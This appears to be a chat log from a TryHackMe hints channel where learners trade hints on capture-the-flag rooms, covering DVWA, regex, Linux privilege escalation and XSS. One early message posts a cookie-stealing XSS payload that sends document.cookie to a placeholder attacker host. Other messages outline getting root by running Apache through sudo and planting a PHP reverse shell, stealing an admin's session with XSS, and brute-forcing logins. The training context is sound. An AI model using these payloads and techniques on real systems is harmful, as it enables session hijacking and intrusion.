its for the DVWA room

https://tryhackme.com/room/dvwa

it's ok i got it by doing ```<script>document.location='http://IP:4321/cgi-bin/grab.cgi?'+document.cookie;</script>

does anyone know wt to do here?

well you don't need to actually supply anything there, just think about how to do it. Have you gotten a reverse shell before by running, for example, a php command in a browser?

@craggy berry Please do not show answers

hello guys still stuck in here

no its like teling about pricesc but i dont know this method

oh god sry guys my bad

tried || \.*\w+ || but not works

they have already given the ssh password to connect its telling aobut privesc

ok, well one way to get a shell is to compromise a web server, getting it to execute some code that sends you a shell. I recommend you try the linux privesc room here https://tryhackme.com/room/linuxprivesc

yeah this is the one i am doing now

lol yeah, sorry, didn't notice 🙂

when you do that you will get a shell as the user that was used to run apache, that's normally not a privileged user, it'll typically be www-data for example

but if you can run apache as root, then the shell you'd get would be privileged, you would have a root shell

make sense?

yeah it was tellng we can use apach2 to gett root how can we do that

"but if you can run apache as root, then the shell you'd get would be privileged, you would have a root shell"

you would run apache as root with the sudo command they gave you

then add a php reverse shell to the document root somewhere, something like pentestmonkey's shell

yeah

this thing i know

then make a listener and request the page in your browser

the shell that pops will be the same user as apache

ohk got it

therefore, you have root

but when i am doing service apache2 start its sghowing some error

ohk thnks for the info

i will figure it out myself

this is the way

I found another way but not working ....

|| Password:(\S){1,} ||

Which Nmap switch allows you to append an arbitrary length of random data to the end of packets?

-jdjaadu

helpfull

Task question room?

what

Further Nmap task 13?

Have you googled it?

I will appreciate any help on the Cross-site Scripting room task 7 precisely. Once i submit the script on the stores Xss page, the webpage just wont load again.

you're not excluding "0" with your solution and you don't match 10 characters after "Password:" but one or more

you can test your solution with https://regexr.com/

Does any one has some ressources for the room "Investigating Windows" please ? I'm stuck on the compromision with the listener

What question is that?

"At what date did the compromise take place" I found the malicious task with it's open port with the Scheduled Task interface but there's no date

If I remember correctly you have to check the firewall

Oh wait I haven't done that question my bad but I guess check the firewall

Ok thanks for the hint

Can someone give me push with the "In A Cave" Room? I'm looking at the walkthrough and following it to the best of my ability, but I'm stuck and can't make sense of it

If you're following the writeup, #room-help is probably the better place

Hi, is it possible to solve first quests in christmas event?

@fickle cobalt Please don't ask the same question in multiple channels like that

It's kind of spammy

isorry

Can someone please give me a hint, vague hint, for the ingredient 3 of Pickle Rick room?

I've searched|| / using a variety of greps similar to: (ingredient, potion, secret, and variants, IT: pot, sec, etc) found the rabbit hole, tried cracking Rick and R1ck using Zap at /login.php, tried SQLi on Rick and R1ck at login.php. ||

I legitimately don’t remember where it is so it’s not a spoiler if I tell you to look in /root just cuz that’s probably where the last ingredient is

Can someone help w the RegEx room? This is the question!
Match all of these filenames (use the + symbol): .bash_rc, .unnecessarily_long_filename, and note1

In RegExr I tried this regex
||"\ .*\w+"||

It matched the files
But it doesn't accept the answer :(

Ik this is too specific but any hint would be helpful

@oblique cliff is it really just in the file system somewhere?

Yes

I've searched hidden files/folders too

Boi

Did you check root

yea, nothing in /root or /

I’m like 69% confident it’ll be there

What the

Verified permissions

You sure?

69%

Coincidence

🙂

So you were able to list everything in root?

And it’s not there?

Wanna not spoil it?

🙂

After all we’re in hints

OOF
Ok

And when you say /root you mean /root and not /

Correct

/root

/root/some_ingredient_im_69%_sure_will_be_in_here

Like that

hint : you don't need to match zero or more ".", it's actually optional (zero or one)

@grizzled jewel and @oblique cliff Thanks, this is a terrible terrible thing THM has done,I can't stop until I find it.

Ty, got it
That was stupid of me

I believe in you @fleet swan

Another question @analog jetty "adding the username and the domain name (not the TLD) in separate groups "
Does this mean I do (username)and (domain)

ye exactly !

alright ty again!

you're welcome

Now I've checked and it looks like nothing is wrong about SUID... I've tried a lot of different things but can't figure out how to root this machine...

So can someone explain while sudo ls showed it, but the other did not?

maybe find has some weird SUID where it changes your user to some less privileged user

just a dumb guess, probably wrong

Run LinPeas or something.

looking for a hint on task 29 of Throwback. I know the user, but not sure how to get the pass.

#743859653343182930 ?

oops. ty.

@analog jetty I'm sorry for tagging again 😂
But, to match the email addresses
What am I doing wrong?
||"(\w+)@(\w+).com"||works
But isn't accepted

Almost ! You actually need a \. and not a "."

your solution works but could match something that isn't an email as well

Oh right
Ty again xD

I'm really not looking forward to the regular epxressions room, I deal with those in PowerShell and they are a pain, but I need to learn them

pls put that in a spoiler ||like this||

since this is #room-hints , it's better if you give a hint towards the answer than flat out giving the answer away

many people had the exact same issue and I told them to go back and read about wildcards

Anyone have a good hint on how to figure out the hidden URI for the File Upload Vulns room?

I'm stuck on task 9 and can't quite seem to figure out how to guess the date-time that gets appended to the shell I upload

I've been tracking my uploads in burp but the date time in the success response from the server doesn't seem to be accurate ...

Ah, ok. I figured it out. Not sure if it was the intended way ... but it didn't involve guessing the date-time stamp to activate the shell.

So I am looking right at the data required for the last question on task 8 in Wireshark 101, and its not working, I am grabbing the data in the ICMP packet? anybody else struggle with this one? GOT it copy 'value'

was is SUID or SGID?, also the file might not have been accessible by the current user.

Stuck on the linux part 1 I did the task before, running binary is eluding me, even when reading prior task. Any help would be great

Do as what the task says.

Don't touch me touch the file

any good ways to recover the router in borderlands if connection to it is lost and the exploit keeps getting a "connection reset by peer" ? Is re-deploy and re-attack the only way ?

I got you

I'll say that from now

Hello guys I mhere again with regexp:D

I ve tried || ^\$\d\$\S || but not working

any hints please??

close

'one or more'

hi,
i am trying to complete the room "hackpack"
and i am stuck on one of the questions:

What is the name of the abnormal service running?

the abnormal service is ||WindowsScheluder.exe||
they even show it in the walkthrough video
but it doesnt take it as a valid answer, can anyone help?

It’s misspelled

Also could you please put that as a spoiler

sorry

@astral smelt thanks

|| ^\$\d\$\S. || not working too

what is one or more A plus if you get this hint

#room-help message

Match every possible IPv4 IP address (use metacharacters and groups)
|| (\d{1,3})\..{3}\d{1,3} || what am I doing wrong?? 😦

you're repeating the wrong pattern

also are you sure you wanted to do ||\..{3}|| ?

yes I am

yeah but I don't think that does what you think it does

in any case, you've realized that || in an IP address there's a pattern you want to repeat 3 times ||

maybe write it somewhere and try to figure out exactly what you want to repeat, and then put it into regex

I m just little bit confused

understandable 😄

this is one of the questions in which google may help you too

@indigo pewter Please don't post answers

Especially in the hints channel

@stuck fractal this is not an answer

why is the http.cap an image and not a pcap file? I am unable to open and analyze.. Wireshark room

@viscid osprey try open it with wireshark (right click, open with Wireshark)

OMG thank you so much, and I learned something!!!

@viscid osprey No problem

need a nudge on Ra

kinda too hard

lol

i have some experience with hackthebox, so asked someone where can i start doing good AD, and he recommended Ra of thm

but m kinda stuck 😅

Where are you stuck?

got domain name and user name

smb, cant list shares

cant get tgt's since pre auth reqd

ig something has to do with that reset button

but idk the security answer

Look at the list of employees and see if they have anything you can use for the security answer

a guy has a green colored icon

one has yellow

everyone else is white

are u asking me to brute force?

or make an educated guess?

No

Look at the employees anything you can get maybe a school name, pet name first car or anything like that

I am seeing the first half of these answers, like Moz.... but not the rest of the unruly path. I'm in the right area? I've reached my 30 minute packet paralysis, and rabbit hole exploring.

thnx, will look into it

what d f, their emails

just saw them

T_T

Did you ever get an answer to "dams Rite hardware fixtures are susceptible to a bypass where a wire is snaked through the keyway and actuates the locking mechanism behind it, what could prevent this bypass?" None of the resources or videos I can find seem to have the answer. 😦 been looking for over 2 weeks 😦

That damn question

And the padlock one

Hey James, the padlock one I got in the end but yeah that question...... neither me nor the guys I work with can figure it out 😦

I have some correct answers for the padlock one but the form won't accept them

RE the adams rite, ur just needs a plate at the back of the keyway/lock

Just can't find a technical term

Yeah , just can not find the right wording for answer

Can someone give me a hint for the mr Robot room
Is /admin/index.html the right thing to look into deeper for getting the second flag?

Created file, ran binary, and did not revieve anything, any suggestions? Linux part 1

Show us exactly what you did

Hi guys. I am not looking for a answer, just a hint. In OWASP Top 10, Task 29, I need to find an exploit, adjust the code and get the value from passwd file. I found two exploits, none in python. One is admin login, second is XSS. I think I should use the second one (first one worked but nothing usefull there). Am I on the right path? Edit: Sorted, found the right file now.

Hey can someone give me a hint for the "Investigating Windows" room task 10 and 11. Im looking in the event viewer and seeing these events but its not taking my answers

Is it me or does THM not recognise any of the shortcut answers in the Burp Suite room?

Ah, needed a dash rather than a +

a knight carries a ?

princess

ez

😐

Sorry for the ping, but I kinda realized that username can't be fire since thats the user account's name, so I kinda made a script to bruteforce the mother's maiden name option having usernames as they have in their email address and the mother's name as their name in the list

But no positives yet

box : all in one

i was like bruteforceing the wordpress for 1 hr.... didn't get the creds for user 'e'

If a bruteforce takes longer than a couple of mins on THM, You've done something wrong.

hi I'm in OWASP Juice Shop, Task 7, Question 2. I get the xss pop up when I visit the Last login page, but no flag. Any idea what I'm doing wrong? I'm open to DM to avoid spoilers for others. ....gonna call it a night, i'll try and get help tomorrow

I'm needing a bit of a hint on the Linux Strength Training room, Task 2, last question on finding the flag. I've read the files with hints, have found a file with the appropriate modification date in the right directory, and if I understand the hint for the question then I need to search the contents of the file for the flag. Stuffed if I can find it, though. I assume my search term in less is incorrect, but I'm struggling to work out the correct thing to search for.

Well, I found the flag using vi, stuffed if I know why I couldn't find it using less.

Hi. I have a question for Marketplace room. I found xss, but right now I'm stuck. Should I try to upload image somehow? for ex converting it to binary via form?

Think of the things you can get with an XSS on an admin user

some csrf then...

?

Something easier

but before that I have to find passwords ...

I tried hydra for 3 users

You have js execution on a site that only an admin can visit right?

Maybe use that js to steal something from them

Something that'd allow you too to be an admin if you identified with it

I could use a hint for all-in-one

Where are you stuck?

I have ||LFI|| and ||SQLi (got username & password hash)|| but I don't know if ||I should search for an interesting file with LFI or crack the password, went through all rockyou.txt and got nothing; or if I should look for something else||

With ||lfi|| did you try ||decoding the whole text||

Ok I got it thanks 😄

||password can't be cracked indeed :d ||

I'm doing the Linux Strength Traning and I'm not getting a password by bruteforcing using the mentioned wordlist in task 7, is there any secret to this?

(The list I'm using is the data.txt which I found on the server as described in the task text)

Is it realistic, that it is necessary to change e.g. the hash algorithm that is used or is this fix for gpg

Try reversing the list?

HM I can try that

You mean the reversing the individual elements I suppose?

No